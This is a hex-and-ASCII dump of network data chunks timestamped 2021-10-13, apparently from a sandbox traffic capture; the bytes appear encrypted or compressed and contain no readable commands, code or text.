                                                          2021-10-13 15:10:52 UTC19INData Raw: 41 86 6f 8a f0 28 0a 45 ec ff c4 f9 c2 a9 7e 5e 85 51 3f 7e b0 5e f8 e4 89 ed 8f 95 34 58 e2 c7 7e 9c 5e cc bb e3 eb 66 ed 80 de b8 54 6a db 55 6d 19 9d f3 98 3f a0 a7 43 43 2a a3 a4 64 86 a3 30 24 1c dc 19 b8 62 34 a9 69 66 46 39 f7 34 cb 94 2f 69 1c 42 fe 40 5b f0 60 6f 28 a6 b2 66 9f c2 c0 34 9b 9f aa 7e f6 70 92 13 71 80 43 ca ce c5 86 45 57 00 99 6e 15 09 f6 ed ac be 92 78 17 53 8a 6c bf 94 cf 20 c9 03 56 cb e7 a2 4c 21 d7 c3 41 c0 3f 8f 6c 13 5d 8d 53 11 36 78 9f 48 81 c2 db f5 54 89 09 c3 ec b7 66 ad 5e dc b6 72 75 c7 7f 02 36 d0 2a af 85 30 20 24 38 68 59 30 88 77 12 3b b3 79 54 aa d1 d3 31 b2 c2 47 d0 73 83 38 5c 20 bd 36 6d db ff 00 8a 17 fb f6 cb 70 84 d8 b1 7d ae 85 93 0d 2a bc 26 e9 ba e5 2b 34 2d 65 5a c4 dc 80 1e 0e 9d c6 48 3f 9e bc ba 5c
                                                          Data Ascii: Ao(E~^Q?~^4X~^fTjUm?CC*d0$b4ifF94/iB@[`o(f4~pqCEWnxSl VL!A?l]S6xHTf^ru6*0 $8hY0w;yT1Gs8\ 6mp}*&+4-eZH?\
                                                          2021-10-13 15:10:52 UTC20INData Raw: e0 bd e7 05 58 31 20 dd c1 6b 9a e5 9d 16 7d d1 01 3f d6 1c 56 6a 40 24 0f 2a 3a ab ed 26 35 53 7f 11 5a 43 77 5d a3 90 b2 66 b5 f7 1a 7b b0 8d 0f bc 3d 47 02 43 ec 77 0d ee cd b4 ec da 80 ae 16 a8 42 28 68 b8 b1 61 c6 a4 02 ca 99 99 c1 92 f9 5d 55 e3 22 2a 4b 97 ac 40 f2 41 1c c2 b9 1e 93 23 26 4b 4b c9 d5 9d 1c 82 03 6f 64 fc 36 4e 5d b8 49 12 14 2c bb 30 94 a4 a9 34 8d 7b 1f fe 4b 05 c8 95 49 7e 81 58 d7 cc fe 30 ba 66 84 dd 5b 5e d3 9e 9f e5 2b 0c b9 5e 0e bc 15 e1 77 77 c4 7a 74 8d 4d 52 8c b1 72 7a 75 df 01 43 d9 49 30 0c e4 5a f1 eb de 7c 97 31 19 96 bb e2 28 86 2a 32 e8 3e 4e b6 24 4d a2 77 9b 97 18 4a bb dc 58 c4 27 58 42 17 8a 11 0c 6c 3e 22 43 06 ed d3 e9 be 22 06 b9 9d 4b 1a db d1 e4 f2 92 a3 cf 28 08 0b b5 71 8d 51 77 d9 03 f5 04 6c 29 cd 79
                                                          Data Ascii: X1 k}?Vj@$*:&5SZCw]f{=GCwB(ha]U"*K@A#&KKod6N]I,04{KI~X0f[^+^wwztMRrzuCI0Z|1(*2>N$MwJX'XBl>"C"K(qQwl)y
                                                          2021-10-13 15:10:52 UTC22INData Raw: 78 05 bf 51 38 d8 a8 7e 09 95 06 78 1e ad ec 79 b7 f6 4c b4 8b 20 bc f7 86 6b d1 60 fe 44 6c 7b fd c7 0b 37 be 59 56 d2 c8 59 8a 6f 46 ec d6 0b 67 ff f9 ec cd c6 a9 78 79 62 53 3f 62 df 23 f9 e4 83 e7 94 78 32 50 ff 37 7d b0 4a 25 9b cd e9 69 eb 96 f6 8c 54 6a d0 43 56 9c 9d 0d 90 21 ac a9 4b 5b d4 ae 81 76 ae a8 30 24 1a a9 18 b9 63 3e c6 6b 67 5d 3a fd 2d c9 94 27 72 cb 4a d2 53 52 d8 88 6d 32 a0 9a 8e 9d c2 c6 5b de 96 aa 74 f2 6c 9e 13 3f 96 4e 34 c0 e9 8d 42 55 28 72 6d 15 0f 54 f2 f7 bb 92 70 06 42 74 6d f0 93 c8 08 46 03 56 c1 7d aa 4c 20 d3 dc 53 cc 4d 8e 73 1c ad 8c 7f 16 b1 6b 99 ea 91 d2 d7 f5 46 9f f7 c3 c0 b5 71 a1 d1 dd a9 60 85 c6 53 00 80 dc 12 dc 74 cf df 0e 22 68 59 2a b8 73 12 f0 1f 70 54 80 df d3 20 b0 50 4d d1 73 86 57 68 20 a7 3c 02
                                                          Data Ascii: xQ8~xyL k`Dl{7YVYoFgxybS?b#x2P7}J%iTjCV!K[v0$c>kg]:-'rJSRm2[tl?N4BU(rmTpBtmFV}L SMskFq`St"hY*spT PMsWh <
                                                          2021-10-13 15:10:52 UTC23INData Raw: 90 00 6e 28 88 83 61 6d cf 7b 77 3f 46 5d 01 60 1a 39 eb 9c c1 03 9f 6b 4e 26 34 fe ad 24 69 e0 fe 51 32 5d 12 07 71 ad ca c7 87 b0 07 73 a6 27 cd 0c 9e 9c c1 a4 8b 45 f9 01 39 ef 30 5e 6a e1 39 f1 2b 38 a0 ef 21 20 2f 88 29 d5 49 5d 43 a8 81 b1 67 b5 f7 1a 72 a5 e5 18 e9 24 48 8c f3 ec 53 01 ce d5 bf e3 da 96 b3 f0 57 6f 02 78 d0 bd a4 dc ab 2a ce 84 67 ca d1 86 5f 3a 24 28 33 52 90 9c 93 f4 70 ff c8 95 02 8f b2 2c 66 40 c1 c4 75 1c 82 0d 71 cd 09 05 6b 5d bf 55 fa eb 01 95 65 83 b7 aa 2a 62 7e 29 02 61 2c f5 c1 8f 9a 6d 5a fd dd fa 34 74 65 a8 47 43 4d d7 b9 8e e1 26 e4 ab 76 33 2b 3f fc 64 73 d5 6f 69 65 b2 7f a5 a4 69 73 62 db 10 56 c0 a0 cf 21 ca 72 ec c0 b6 83 79 ca 0d 7f 6c c2 31 88 74 de fe 14 44 b4 50 89 a6 77 12 bc 4f 57 87 d8 58 c4 0b 0b bc 16
                                                          Data Ascii: n(am{w?F]`9kN&4$iQ2]qs'E90^j9+8! /)I]Cgr$HSWox*g_:$(3Rp,f@uqk]Ue*b~)a,mZ4teGCM&v3+?dsoieisbV!ryl1tDPwOWX
                                                          2021-10-13 15:10:52 UTC24INData Raw: c4 76 d4 11 94 1a 47 29 42 50 73 93 7a 11 df f7 aa 73 67 35 2e b4 f0 bc 6a 43 33 9b 87 66 a8 e1 4a 24 5f 64 f5 f0 a7 66 ad 77 d3 b4 7e 33 d9 96 24 01 95 0c fc b4 b2 e0 71 6a d9 50 be 75 23 8f 8b a9 ff ba 68 fe 45 63 4c fd c8 0b 39 81 83 57 fe c0 c1 8e 6f 4e f2 f5 03 48 ec ff c6 34 b3 9a 67 2f 8d 51 3f 60 98 52 fa e4 8f c5 ab 74 32 52 62 c1 7c 9c 5a fe 58 e1 eb 69 ef 9f a6 91 4d 14 d2 55 6d 1d b5 00 93 3f a6 81 67 43 2a a5 2d 6c 86 ac 34 f9 d1 c4 19 b8 61 2b d0 5a 7f 23 38 f7 34 c1 bc 21 6a 35 4d d6 64 54 f0 6a ef 3a a6 b2 63 42 6d c2 34 a3 94 b5 04 cb 69 ec 1b 37 89 47 e2 ce c6 86 43 65 24 99 6f 1f 89 fe ed f9 b3 4f e9 1b 53 8a 6e c3 e6 fc 39 b8 0b 56 cb f9 8a 5c 23 d7 c5 69 e4 4d 86 66 93 5b 8d 53 15 6b 02 9d 48 8e c0 c4 d5 7d 90 77 ca ec b7 62 85 8d d7
                                                          Data Ascii: vG)BPszsg5.jC3fJ$_dfw~3$qjPu#hEcL9WoNH4g/Q?`Rt2Rb|ZXiMUm?gC*-l4a+Z#84!j5MdTj:cBm4i7GCe$oOSn9V\#iMf[SkH}wb
                                                          2021-10-13 15:10:52 UTC25INData Raw: 37 4d 5d 0f 7f 74 0f b9 d5 6d 9e 55 d1 8a dd 90 a5 bc b9 f8 dd d2 24 61 17 ce 77 a0 93 1c e2 8f e2 90 84 60 bd c8 47 3c 6c c3 0a 42 05 aa b9 62 64 d7 9a 42 00 53 4b 6e 5e 03 c7 ee 3e 7b 16 54 6c 6d 27 38 fe ae 21 90 fb c1 48 25 41 09 11 51 ad ca c7 89 9d 14 57 5e 08 d8 da 93 84 f4 86 25 53 c2 1a 26 d9 fe 5c 46 4c 28 fa 3a 12 76 fc 3b 29 1a 9f 0a 5a 58 46 58 56 91 99 73 49 e7 3d 55 ab 9a 3d e3 37 44 1e 57 e0 89 1d d9 d0 bc 19 db ab b9 ea b8 65 06 73 af 9f ae cf b9 1d dc 96 7c c0 af ef 40 34 d0 23 06 4b 85 97 98 26 78 0a d6 b6 0a 92 dd 36 7c 5f d9 44 51 30 8c 0b 68 5c 37 35 44 5d b5 4c e0 0a 13 aa 3c 9f b5 b5 35 7f 84 32 d0 6a 11 fb f0 60 92 75 41 f0 df e5 23 9b 7f 9b 5e a5 5f ff b7 9d f4 31 32 b3 5b 36 36 06 f1 68 6c c6 65 6d 62 57 61 a3 59 7f 4c 68 d9 10
                                                          Data Ascii: 7M]tmU$aw`G<lBbdBSKn^>{Tlm'8!H%AQW^%S&\FL(:v;)ZXFXVsI=U=7DWes|@4#K&x6|_DQ0h\75D]L<52j`uA#^_12[66hlembWaYLh
                                                          2021-10-13 15:10:52 UTC27INData Raw: 24 06 cc 4c 81 81 41 8b 1a fe f6 e1 0c 40 5e 11 5f 1a 06 17 19 ad df 8e 7c 08 83 ce 0e 39 77 0f 54 9f e7 0e c3 3d 20 e3 44 cb 5e cf 0f e0 23 54 46 45 4a a5 84 5d 1a cd f8 84 42 42 35 24 b5 61 bb 70 95 24 49 c0 74 a7 c9 51 3a 2a 5d ff 9f be 69 b7 a5 e8 b1 6c 22 c8 64 17 d7 18 2d 7c bc b3 f3 65 b5 ef 5c af 65 37 81 ec b2 fd c5 60 f4 54 68 75 e7 1d 18 30 ab b6 58 d6 d3 40 86 65 5d f8 39 05 51 fd f1 12 fd d7 a6 7c 40 8a 79 26 65 b0 54 f5 f5 86 f7 59 67 3d 5a f3 c6 54 85 5f 23 b9 ee fa 66 f7 56 cd ad 56 7b d5 7d 74 18 9d 07 83 32 b1 a6 59 52 27 79 7b 77 89 ae 21 2b 34 df 18 b8 69 27 ac 78 69 47 e6 e4 3b d4 91 38 b3 22 9d 73 6b 54 f0 61 7c 36 a4 a3 68 8e c6 d6 25 a6 be b1 7f f8 7a 91 02 3b e6 63 cb c1 cf bf 69 4c 00 99 67 35 07 76 ed f9 f7 0d 78 19 53 89 7d d0
                                                          Data Ascii: $LA@^_|9wT= D^#TFEJ]BB5$ap$ItQ:*]il"d-|e\e7`Thu0X@e]9Q|@y&eTYg=ZT_#fVV{}t2YR'y{w!+4i'xiG;8"skTa|6h%z;ciLg5vxS}
                                                          2021-10-13 15:10:52 UTC28INData Raw: 57 f7 70 d6 84 d3 b2 88 c1 10 18 00 5e 3f b1 94 37 aa 5e b9 0c 39 a7 14 bb 5d 69 c7 f5 33 c7 17 d9 3d 85 5f c8 4f 66 18 2e 3b 6b 59 2a 65 6f 7a a9 ce 72 8f ab d0 b7 d0 ba 80 b6 91 eb cb 5f 6f 72 02 d0 43 b9 99 16 e5 ea c8 a2 7a 6b 0c c9 5c 56 72 91 0a 48 10 97 a6 74 65 d7 8f 74 7c d5 4b 7f 4f 09 3c c7 07 77 14 4f 76 41 50 a4 fe a4 38 84 e7 c3 55 31 78 91 0c 6d 55 dd 66 82 9b 05 59 25 34 ce f2 3d 9b c9 9f 26 df ec 01 39 fd 28 6a 6b 47 33 e6 a7 29 a0 ef 31 1e 88 8c 11 50 61 07 43 a8 9a a2 a8 c6 dd 36 7d b2 88 3a f8 22 58 2a 5e f8 89 0a da 42 ab e7 da 86 a4 e3 b8 65 38 7a a9 3d b5 d7 b8 14 41 ba 67 c0 bf 56 4e 31 3d 2e 3b 4d 80 88 9a 7d 44 01 c9 b8 0a 84 cc 2a 71 57 57 ab 5d 0b 94 95 68 5a 08 05 e9 5d bf 55 ca 04 0d af b7 b3 bb bf 26 65 e0 1b ed 60 00 fa 3a
                                                          Data Ascii: Wp^?7^9]i3=_Of.;kY*eozr_orCzk\VrHtet|KO<wOvAP8U1xmUfY%4=&9(jkG3)1PaC6}:"X*^Be8z=AgVN1=.;M}D*qWW]hZ]U&e`:
                                                          2021-10-13 15:10:52 UTC29INData Raw: 22 6f f4 e8 dc cf 07 08 62 34 5e dd bb 47 8a 75 2b b9 60 b6 b0 c8 39 cf 23 43 ea 19 ab 4a 58 0a 6f 3f 47 1a 70 34 97 48 1c 34 09 e4 52 8a 5c 4d 99 1c ef e8 ee f6 54 40 2c 25 4c 06 1d 11 60 e8 7f 7a 67 95 c7 2e 30 02 07 45 d0 27 08 15 2e 26 c1 5c 44 76 d6 4e 26 29 5e 57 39 7a 72 97 58 0b fe e9 21 70 43 35 2f ad 53 ab 72 ce 1c 46 c2 64 bb c5 59 3e 35 4f fd ad b9 78 85 68 fa be 77 22 da a8 11 25 83 19 64 94 a9 e1 75 bd ef 71 af 51 4e bb fc 9a ec d5 42 ef 66 08 48 f7 cb 01 2e 8b b0 38 d3 cb 41 8c 7e 6c ef 47 24 4a ec f5 d5 09 ab 86 7f 51 8f 40 3b 72 a1 5a 77 53 e6 dd 8e 74 38 4b c7 d6 3c 11 75 23 b3 e2 f8 48 fc a5 c1 8a 45 4b cc 4a 2d 31 86 0c 90 35 d3 80 42 43 20 bc 8b 75 a0 bd 11 4b 3a c7 19 b2 70 13 b8 4e 4e 47 31 f7 3e ed cd 2d 69 33 63 d0 42 54 f6 0f 12
                                                          Data Ascii: "ob4^Gu+`9#CJXo?Gp4H4R\MT@,%L`zg.0E'.&\DvN&)^W9zrX!pC5/SrFdY>5Oxhw"%duqQNBfH.8A~lG$JQ@;rZwSt8K<u#HEKJ-15BC uK:pNNG1>-i3cBT
                                                          2021-10-13 15:10:52 UTC31INData Raw: ef 49 02 4c 96 71 52 90 17 c6 38 3b 7d c3 36 0c d8 0f c5 21 3a 1f 1e 69 11 8f 67 f7 61 6f fb d5 e1 5d 9e bc 0f 52 75 0c 55 b0 04 8f c1 8a 3e bc a4 d2 07 0b 0d a8 28 63 98 0a a4 5f 25 35 ce be ea ba 6e 65 ff f8 18 0e 1a c4 a5 cc 4c e4 6d 2e 14 36 ad 6d 8c 05 7b 7c 00 a8 df 7d a7 a0 2e a7 ff 9f ab a7 1c ca dc d2 2f 61 0b ce 5c a0 87 1c e2 9b e2 b3 84 60 bd fb 47 33 5c 0a 22 53 03 93 84 b1 76 d7 85 6d 3b 5c 4b 7f 4f 32 01 ee 12 7c 60 57 67 45 24 2a f7 bb 23 84 ee d2 42 2a 4f 1c f0 6c 7f c5 fa 8f 8d 9f 70 20 20 da d0 9e 84 c6 86 31 53 c2 0e 26 f0 fe 5c 46 3a 2d 21 a8 16 a0 ee 18 22 3c 8c 1b 72 54 5e 43 ae 8b 38 79 4b f6 37 6e b8 8a 36 ff 23 64 13 44 fb 83 ae d3 c4 bb f8 e2 0b 88 e8 a9 6f 8c 7a a5 87 b5 d5 0d 13 c6 9c 71 4c 81 f4 5f 3b 8c 33 21 5b 8e 10 bd f0
                                                          Data Ascii: ILqR8;}6!:igao]RuU>(c_%5neLm.6m{|}./a\`G3\"Svm;\KO2|`WgE$*#B*Olp 1S&\F:-!"<rT^C8yK7n6#dDozqL_;3![
                                                          2021-10-13 15:10:52 UTC32INData Raw: d1 5d ea 1f 5f d8 94 99 be 1b a1 ab 0a 7d 8a 43 e3 37 3c 70 dd 84 29 0e 2d a7 c8 03 08 b6 20 b8 8b c2 c7 99 fd f3 bd 99 67 3a 64 dc cf c4 31 00 4b 18 0c 3b d7 a8 67 80 67 3a 90 17 55 b0 e4 37 f5 24 5d f6 1f b3 41 c9 35 42 3a 4a e8 50 2e 90 95 18 2e f7 e5 79 8a 83 4e d2 8d f0 f3 c8 f7 4f 5c 39 43 06 f8 1c 37 b4 d5 9a 30 70 43 9b 10 3e 64 0e 53 6e f7 24 17 39 22 e1 5c db 7f 28 0f cc 2b 75 52 72 2e 8c 68 ad 0f d7 dc a6 59 46 7f bf a1 7d 9a 68 55 3c 43 e7 2f bf 37 1c 3e 60 5f dd 38 b9 4c be 43 f9 be 40 33 df be 43 01 95 17 6a b0 99 cf 75 bf e9 ad bf 59 23 88 f1 9a ee dc 9e ff 69 6a 1a c1 cb 0b 3b da e9 56 fe c0 4a 9f 63 4e fe 3e f4 4a c0 fd d3 27 c4 a1 67 af 84 7d 3d 4f b2 75 36 e3 8b 82 c0 75 32 52 c8 c9 7c 9c 4d 13 b1 e3 be 69 ed 80 9a a2 54 7b cc 59 46 54
                                                          Data Ascii: ]_}C7<p)- g:d1K;gg:U7$]A5B:JP..yNO\9C70pC>dSn$9"\(+uRr.hYF}hU<C/7>`_8LC@3CjuY#ij;VJcN>J'g}=Ou6u2R|MiT{YFT
                                                          2021-10-13 15:10:52 UTC33INData Raw: 17 d3 52 36 ff cb 70 88 d8 b1 7d 32 8c 93 0d 31 bc 26 e9 a2 e5 2b 35 06 2c 5e ec 6d 88 1e 04 fc 9e 49 3f 60 bf bc d2 b8 b2 e2 17 39 df 96 60 57 8b 72 a5 39 17 7a c2 34 0a ce 23 55 97 ec 1e 06 75 d8 97 b1 6b 45 70 e3 2a ea 77 85 bc 07 c6 52 81 a5 5f ff 66 d8 84 3c b7 2a 74 20 0f 01 56 23 64 9e 33 86 4b b5 0a 42 e7 eb ba 7b 11 f0 f0 ce 08 cf cc 65 bf 66 c8 67 3e 15 27 2b 5a de 13 7b 6d bb 34 c7 6b bb 1f 4c a0 c5 9b ae b0 b9 fa dd d2 24 7b 0b 5f e7 ab 52 19 9f b7 fd a3 7a 61 91 d8 26 79 1f b8 9c 42 03 99 3a fd 6d de 0b c1 04 92 4e 5f 45 1b 39 ef 4f c2 88 4c 4d 45 3f 39 ed 94 37 97 68 d2 53 25 18 12 0e 7c 7b 57 eb 85 91 07 37 ac 20 da d0 98 92 47 22 1e ac d3 01 39 cd 0b 75 48 44 39 f7 58 4c a1 ef 3a 4c 14 10 11 5a 43 5e 2c 35 90 b5 74 47 fe b8 ca 93 64 3d e9
                                                          Data Ascii: R6p}21&+5,^mI?`9`Wr9z4#UukEp*wR_f<*t V#d3KB{efg>'+Z{m4kL${_Rza&yB:mN_E9OLME?97hS%|{W7 G"9uHD9XL:LZC^,5tGd=
                                                          2021-10-13 15:10:52 UTC34INData Raw: 25 63 34 a3 62 64 75 79 f7 34 cf e0 1c 69 35 4a ed 48 45 f8 48 5f 31 a6 b4 61 b7 e6 c0 34 a9 f9 5d 7e f8 7a 83 1b 1f 69 41 ca c7 aa d6 45 4d 0a 88 67 02 66 ba ed f9 bd 83 70 31 19 8a 6c d6 f2 84 20 c6 09 47 c3 92 5b 4c 20 dd d0 47 e8 7c 85 6c 15 5f 83 56 7e e9 70 9f 42 e1 a2 da f5 44 9a 1d e9 a5 a6 72 c2 17 d5 b6 78 53 66 7f 02 a1 ca 26 be 8c 37 36 23 ac df 36 9f 88 77 18 33 0e 7c 5a af ce df 5e d3 79 4e da 5b ee 39 5c 2a b4 3c 45 46 ff 00 80 06 38 90 56 70 8a d2 a2 76 68 8a 82 06 33 ad 2d 67 17 8a 85 35 2d 6f 4b d0 55 42 1e 0e 99 eb e6 e1 7c a4 ae 29 34 b9 c9 54 3d 4f 87 74 28 b4 1d 38 38 78 27 d1 30 17 03 36 dd 27 2c 12 8f d5 6d 2e 67 e6 64 58 d1 28 e0 77 80 a8 12 4d e0 36 37 4a d3 13 df 93 27 be 8c 5f 08 14 0a 5f 46 d2 95 1b a2 5a b1 1d 37 af ee ac 60
                                                          Data Ascii: %c4bduy4i5JHEH_1a4]~ziAEMgfp1l G[L G|l_V~pBDrxSf&76#6w3|Z^yN[9\*<EF8Vpvh3-g5-oKUB|)4T=Ot(88x'06',m.gdX(wM67J'__FZ7`
                                                          2021-10-13 15:10:52 UTC35INData Raw: de 9f ae dc af 02 cd 9e 57 c4 be 8e 5f 3a 2e 6f 2a 41 85 88 89 83 0f 00 c9 b3 15 fa b8 26 67 4a c6 b8 2b 54 82 09 7d 44 19 5e 6f 5c bf 55 ff 10 11 bc 36 99 cb 85 2b 73 70 22 f9 78 6f dd eb b6 8b 6f 5b e5 a3 d0 22 8a 6e 87 6c 32 5f d3 b3 8c e1 2b 1f c5 75 37 3c 1f f2 70 66 d2 6f 69 65 5d 7a 07 10 11 50 67 db 0b 59 03 44 df 08 a7 3e e8 f8 d0 75 e9 5d 04 68 b0 12 e7 8b 4c 6c ee 37 2b e3 4b b9 a8 ab 99 bc 20 40 a9 d8 52 ff 23 43 bd 0a a6 16 07 64 9a 29 45 4d e9 dd f8 ba 3f f8 ba b1 40 0d ab a7 f7 fc 92 b2 cb 32 ed 3a 9d 74 21 63 6c ca 4a f5 15 79 25 38 0b db 8e dc 6f 9b 6c 3a d9 94 9a ad ec a8 8f 0b 05 b7 5d ea 30 53 e4 c4 7a 22 4d 02 a3 cb 0d 0c 6a 5f c6 90 cf cd 83 ef 1c b9 a4 63 4d 42 dd c6 d4 de 04 7f 70 19 5f d7 a2 76 9e 72 55 b7 0e ab bb cb 1b 8a 2e 44
                                                          Data Ascii: W_:.o*A&gJ+T}D^o\U6+sp"xoo["nl2_+u7<pfoie]zPgYD>u]hLl7+K @R#Cd)EM?@2:t!clJy%8ol:]0Sz"Mj_cMBp_vrU.D
                                                          2021-10-13 15:10:52 UTC36INData Raw: 35 58 f3 ce 63 91 a0 22 9f e8 fa 6f d4 60 de a2 54 75 d4 46 6a 19 8c 0a 89 c1 a1 85 46 47 26 b5 be 63 86 bd 37 3e e2 c7 35 a0 6b 14 a9 68 66 5d 18 e3 35 c5 9e 07 1d 34 4b f4 7a 7d 0f 9f 90 29 b5 b5 67 8e c5 d8 ca a2 ba a0 7d ee 30 32 13 37 89 5a d9 c6 c5 97 42 52 0b 67 6e 39 10 fe cd fc b6 92 78 31 47 8b 6c d6 b5 bb 21 c6 09 6f b4 fd a2 4c 3f db d0 46 c0 5c 81 73 1d ad 8c 7f 29 a7 77 9a 4f 02 d2 db f5 4c e6 7f c3 ec bd 4e da d0 d5 bc 57 56 c2 59 13 af f2 20 d6 9a 30 20 26 53 78 59 31 8a 64 17 29 1a 0b 02 aa df d7 b5 dd de 4e d0 75 93 37 4f 27 a7 27 6a c5 f3 fe 8b 3b 39 81 86 70 8a dc a2 7b 66 81 80 0a 25 ad 21 fe 5e e4 07 36 35 76 5d c4 2b 8e 08 f0 92 ea 4b 28 79 b2 ba 4d 08 a6 c6 ab 10 6f 94 4b 58 b7 43 c6 c6 e8 0e a4 31 1d d5 0f a3 21 3a 1f 02 66 07 a8
                                                          Data Ascii: 5Xc"o`TuFjFG&c7>5khf]54Kz})g}027ZBRgn9x1Gl!oL?F\s)wOLNWVY 0 &SxY1d)Nu7O''j;9p{f%!^65v]+K(yMoKXC1!:f
                                                          2021-10-13 15:10:52 UTC38INData Raw: ef 3a 59 02 8d 11 50 4f 75 01 ab 90 b3 00 2b f6 36 79 9b d8 3e e9 22 64 c0 44 fb 83 63 fc ce ac ed dc af 28 ea a9 68 50 0b ae 9f a0 f4 0f 00 cd 83 4f 02 be f4 55 55 10 23 2a 4b 92 b4 23 f2 6b 07 b7 d9 19 89 d9 0f c5 42 cb bc 78 de 82 09 73 38 21 2c 45 57 b9 77 a8 16 00 bf 59 ff a4 ae 2e 5b d6 31 fc 66 28 32 ea b6 8b 11 60 fc cc f4 25 a2 c1 86 44 5d 20 b3 b9 9f e1 12 bc a8 5a 30 14 d7 e1 77 7d ba 40 6c 73 46 78 e6 26 7f 60 6c b4 83 53 dd 54 dd 0a e3 3a fb ff f2 ff 87 35 0f 64 bc c6 56 a0 44 40 e2 33 4d 9c 64 b9 a2 7d bc b9 64 1e a1 f0 eb d5 23 45 af 12 b7 12 8b d3 b2 18 65 04 ed c0 f1 ac 2c f0 93 98 5f 04 e0 c7 6d e5 94 a3 cd 35 de 2e 99 74 ac 70 69 db 02 dd 24 68 31 39 54 b6 9e d9 6d 9e 37 ee d8 94 96 b1 ed b7 51 1c 62 b1 54 fb 33 b2 ce f6 b5 3a 25 0c 26
                                                          Data Ascii: :YPOu+6y>"dDc(hPOUU#*K#kBxs8!,EWwY.[1f(2`%D] Z0w}@lsFx&`lST:5dVD@3Md}d#Ee,_m5.tpi$h19Tm7QbT3:%&
                                                          2021-10-13 15:10:52 UTC39INData Raw: d1 54 63 0b 30 cb 0b 35 dd 08 57 fe cb 4d 80 6d 46 99 a2 0b 4b e6 e8 ab a0 c5 a9 74 3e 09 50 3f 6e 98 41 fa e4 8f c5 a8 74 32 52 8d 19 7c 9c 54 32 b7 8c 20 69 ed 8a f3 6a 8a 47 cb 51 18 22 9d 0d 91 13 ac b8 47 36 11 af ad 65 e9 fb 30 24 16 1a c7 ad 46 1c 9e 69 66 57 3d e1 b9 d0 94 2f 68 3e 63 c6 40 54 fa be 68 34 c9 65 67 9f c8 ea 33 89 96 aa 7f e4 70 92 11 37 8f 43 a8 a9 c5 90 45 4d 00 99 6f 15 0f f6 97 79 b7 87 62 19 53 8b 7f ec 9e cf 77 c7 03 56 9c fd a2 5d 36 c4 c6 79 83 4c 86 6c 13 42 88 4c 1b 48 70 b3 5c 86 ea ba f6 4e 8f 66 60 ec b7 6c 94 d0 d4 b6 72 64 cc 6c 07 ab c8 2f b4 74 31 0c 2f 20 40 76 31 88 7d 3e 07 03 63 51 aa ce d6 2e bb 86 4f fc 7a 9d 3c 55 ba ab 29 67 c9 fa 00 9b 12 2d f4 35 71 a6 cd b7 75 51 93 90 0d 23 94 02 e9 a0 ef 44 e5 2d 65 50
                                                          Data Ascii: Tc05WMmFKt>P?nAt2R|T2 ijGQ"G6e0$FifW=/h>c@Th4eg3p7CEMoybSwV]6yLlBLHp\Nf`lrdl/t1/ @v1}>cQ.Oz<U)g-5quQ#D-eP
                                                          2021-10-13 15:10:52 UTC40INData Raw: a4 32 97 e0 fa 53 25 50 12 54 6d 49 bf eb 8b 81 05 58 30 22 da ee 95 c2 44 95 28 53 d3 01 39 fc 00 8d 6a 4b e5 f1 3a 0c a0 ef 31 2d 0c 8b 11 b4 49 5d 43 f2 90 b5 6f 54 fa bb 56 b3 9b 3c fa 2c 5d 0a 52 ed 15 1d ca d8 ba 7b cb 8f af fe 35 7f 26 72 b8 03 b5 d4 b5 14 51 94 6f db a8 68 4e 32 32 34 b6 50 9c 81 94 6c 7a 09 d7 af 85 98 d5 38 6e 56 57 ab 58 03 88 1f e5 46 17 32 4e 4b 23 4e e4 1e 02 a0 20 89 bb a2 02 68 7b 33 f6 62 8e 47 f5 a6 5b 69 88 70 e7 fe 23 8b 68 86 5b 54 56 c5 bb 11 52 25 15 70 72 2d 3d 15 eb 04 e0 d4 7e 6b 60 4a 61 99 2a 55 60 66 da 12 57 d5 d0 79 1c cd d7 5e 22 cd a6 91 e3 88 43 ba ce 38 8c 4d 48 66 89 5b a4 91 a8 a7 61 8e ab 67 4c a9 d8 52 dd 35 4a aa 1e 28 a1 14 61 2a 9e 85 3d f2 d2 f8 b0 17 64 b8 b1 44 1c f7 cc f0 e2 9b a3 ce 5d 6e 0b
                                                          Data Ascii: 2S%PTmIX0"D(S9jK:1-I]CoTV<,]R{5&rQohN224Plz8nVWXF2NK#N h{3bG[ip#h[TVR%pr-=~k`Ja*U`fWy^"C8MHf[agLR5J(a*=dD]n
                                                          2021-10-13 15:10:52 UTC41INData Raw: c2 63 a8 fd 6a 3b 24 4d ec 8e ae 66 ad 43 fb a2 31 33 d1 a4 00 01 94 1d 4c b4 b2 ad 70 b7 fe 0c be 75 30 e3 42 9a e6 ce 6a f8 6d a3 64 f6 cd 64 f5 a9 a7 5d d6 5c 40 86 65 21 61 29 0a 41 ff fa d5 2e d0 81 10 52 85 57 29 e9 b7 5e f9 e5 9d f9 9b 5c 9a 58 e2 c3 54 8d 5e 23 b9 ee fa 6c f9 a8 b1 a1 54 6c cc d8 6a 19 9d 0c 84 2b b4 81 eb 43 2a a5 85 75 86 ac 3a 37 18 cf 05 34 5c 34 a9 68 70 75 a8 f6 34 cf b8 31 78 31 53 72 7f 54 f0 61 79 1a 3e b3 67 95 ee ce e4 ea 96 aa 7c d0 64 92 13 3d 9a 44 e1 cd 15 cc 45 4d 02 b1 7b 15 09 fc fe fe a1 81 70 67 26 8b 6c d6 8e c6 36 d4 0b 44 c2 d5 c1 4c 20 d1 4f 7e c0 4d 87 7f 15 42 8b 7b 4b b6 71 95 5e a0 c5 dd fe 93 19 0d c2 ec a6 6f a1 a2 4c b7 72 71 d4 75 13 a1 cb 03 87 fa 33 20 22 0a f2 58 31 82 66 3b 13 6e 73 54 ac b0 48
                                                          Data Ascii: cj;$MfC13Lpu0Bjmdd]\@e!a)A.RW)^\XT^#lTlj+C*u:74\4hpu41x1SrTay>g|d=DEM{pg&l6DL O~MB{Kq^oLrqu3 "X1f;nsTH
                                                          2021-10-13 15:10:52 UTC43INData Raw: 99 3d db 12 fe a3 7c 0e bb da 56 3f 42 81 2b 2d 1f 92 8e 6b ba d8 a0 5e 24 48 4b 75 56 3d 11 d7 12 76 1e 9b 67 54 2c 2e 28 b7 21 86 f2 c3 78 1b 25 ef f1 92 42 c0 fc 53 88 0e 49 3a 31 f0 e4 14 67 36 6a e0 5c f6 29 0e fc 00 57 79 6f 11 c9 2b 16 aa 31 30 30 16 8b 3b 5a 49 5d 02 9c 90 b5 7e 4b f6 36 e3 b1 9b 3d 84 26 4c 02 4f fe 89 0c cd cf ac e7 c0 87 b7 e9 a9 6e 2e 6b bf 9f a4 dc 86 07 cd 85 5d c5 be f4 50 3a 2e 22 30 41 94 9d 91 c0 6c 01 d9 ba 19 89 bd 27 67 51 dd a9 5a 24 82 0a 79 57 1f 3c 4f 42 a7 a1 ed 39 1b bf f7 d1 a4 ae 2b 5b 6e 33 fc 6a 28 87 eb b6 8b 56 